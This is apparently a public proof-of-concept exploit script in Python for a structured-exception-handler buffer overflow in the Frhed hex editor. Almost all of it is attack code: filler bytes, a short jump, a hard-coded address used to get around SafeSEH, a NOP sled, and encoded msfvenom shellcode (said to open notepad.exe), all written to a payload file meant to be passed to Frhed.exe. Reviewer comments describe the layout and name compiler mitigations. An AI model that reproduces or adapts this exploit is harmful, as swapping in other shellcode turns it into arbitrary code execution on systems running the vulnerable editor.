#Celal Dogan DURAN - ZAYOTEM
#run the exploit.py and copy the payload. Open cmd where Frhed.exe is located, then run Frhed.exe with payload argument.
#
# NOTE(review): this script is a proof-of-concept payload generator. Its only
# effect is to write one file ("payload.txt"); it performs no network or process
# I/O itself. The byte layout written at the bottom is, in order:
# padding + jmp + outrange + nop + buf + send.

# Output file, opened in binary mode so the raw bytes below are written verbatim.
# NOTE(review): plain open()/close(); a `with open(...)` block would guarantee the
# handle is closed if write() raises.
f = open("payload.txt","wb")

# Filler written before the jump stub; the length is the author's constant and is
# not verified here.
padding = 494 * b"A"

jmp = b"\xEB\x1E\x90\x90" # Jump forward 32 bytes to pass bytes in memory that corrupts the shellcode.

# \Device\HarddiskVolume3\Windows\Fonts\StaticCache.dat
outrange = b"\x18\xB1\xD1\x03" # To bypass SafeSEH protection jumping out of SafeSEH scope address. 03XXB118 -> call dword ptr ss:[ebp+C]
# The third byte changes on every start because of ASLR, so the exploit only succeeds when the D1 byte happens to match.
# NOTE(review): the hard-coded address in a region outside SafeSEH coverage is what
# this relies on. Linking every loaded module with /SAFESEH and /DYNAMICBASE (so no
# such address is both usable as a handler and stable) removes this bypass.

send = 2000 * b"D" # Blocking the box for the error message

# NOP sled (0x90) placed immediately before the shellcode.
nop = 50 * b"\x90"

# -------
#buf = msfvenom -p windows/exec cmd=notepad.exe -f c -e x86/alpha_mixed
# Shellcode bytes as produced by the command above (author's note); the bytes are
# reproduced as given and are not decoded or verified here.
buf = b""
buf += b"\x89\xe1\xda\xd8\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x7a\x48\x4c"
buf += b"\x42\x57\x70\x33\x30\x67\x70\x43\x50\x6e\x69\x4a\x45"
buf += b"\x76\x51\x79\x50\x42\x44\x6e\x6b\x66\x30\x64\x70\x4c"
buf += b"\x4b\x36\x32\x46\x6c\x4e\x6b\x61\x42\x57\x64\x6e\x6b"
buf += b"\x32\x52\x35\x78\x34\x4f\x4f\x47\x62\x6a\x66\x46\x46"
buf += b"\x51\x49\x6f\x4e\x4c\x75\x6c\x63\x51\x43\x4c\x63\x32"
buf += b"\x34\x6c\x77\x50\x6a\x61\x78\x4f\x64\x4d\x53\x31\x68"
buf += b"\x47\x38\x62\x6a\x52\x76\x32\x61\x47\x4e\x6b\x72\x72"
buf += b"\x34\x50\x4e\x6b\x72\x6a\x65\x6c\x4e\x6b\x62\x6c\x67"
buf += b"\x61\x62\x58\x7a\x43\x77\x38\x47\x71\x6e\x31\x62\x71"
buf += b"\x4e\x6b\x30\x59\x57\x50\x56\x61\x78\x53\x4c\x4b\x63"
buf += b"\x79\x36\x78\x49\x73\x65\x6a\x42\x69\x6e\x6b\x76\x54"
buf += b"\x6c\x4b\x66\x61\x7a\x76\x45\x61\x4b\x4f\x4e\x4c\x5a"
buf += b"\x61\x68\x4f\x56\x6d\x46\x61\x6f\x37\x47\x48\x49\x70"
buf += b"\x74\x35\x68\x76\x55\x53\x61\x6d\x7a\x58\x55\x6b\x61"
buf += b"\x6d\x74\x64\x50\x75\x69\x74\x51\x48\x6e\x6b\x61\x48"
buf += b"\x56\x44\x63\x31\x38\x53\x75\x36\x4c\x4b\x64\x4c\x70"
buf += b"\x4b\x4e\x6b\x46\x38\x67\x6c\x57\x71\x58\x53\x4c\x4b"
buf += b"\x36\x64\x4e\x6b\x53\x31\x38\x50\x4f\x79\x77\x34\x65"
buf += b"\x74\x65\x74\x43\x6b\x71\x4b\x73\x51\x70\x59\x72\x7a"
buf += b"\x30\x51\x69\x6f\x69\x70\x61\x4f\x63\x6f\x52\x7a\x4c"
buf += b"\x4b\x36\x72\x38\x6b\x6c\x4d\x61\x4d\x70\x6a\x55\x51"
buf += b"\x6e\x6d\x6b\x35\x4d\x62\x65\x50\x47\x70\x73\x30\x66"
buf += b"\x30\x70\x68\x74\x71\x6c\x4b\x70\x6f\x4f\x77\x49\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x4e\x55\x4e\x42\x56\x36\x42"
buf += b"\x48\x4d\x76\x6f\x65\x4f\x4d\x4d\x4d\x39\x6f\x58\x55"
buf += b"\x47\x4c\x36\x66\x63\x4c\x77\x7a\x6f\x70\x49\x6b\x79"
buf += b"\x70\x72\x55\x57\x75\x6d\x6b\x50\x47\x75\x43\x74\x32"
buf += b"\x62\x4f\x53\x5a\x53\x30\x71\x43\x79\x6f\x58\x55\x30"
buf += b"\x6e\x72\x4f\x30\x74\x53\x55\x34\x30\x31\x71\x62\x44"
buf += b"\x54\x6e\x32\x45\x70\x78\x71\x75\x75\x50\x41\x41"

# Write the assembled payload in the documented order and release the handle.
f.write(padding+jmp +outrange + nop + buf + send)
f.close()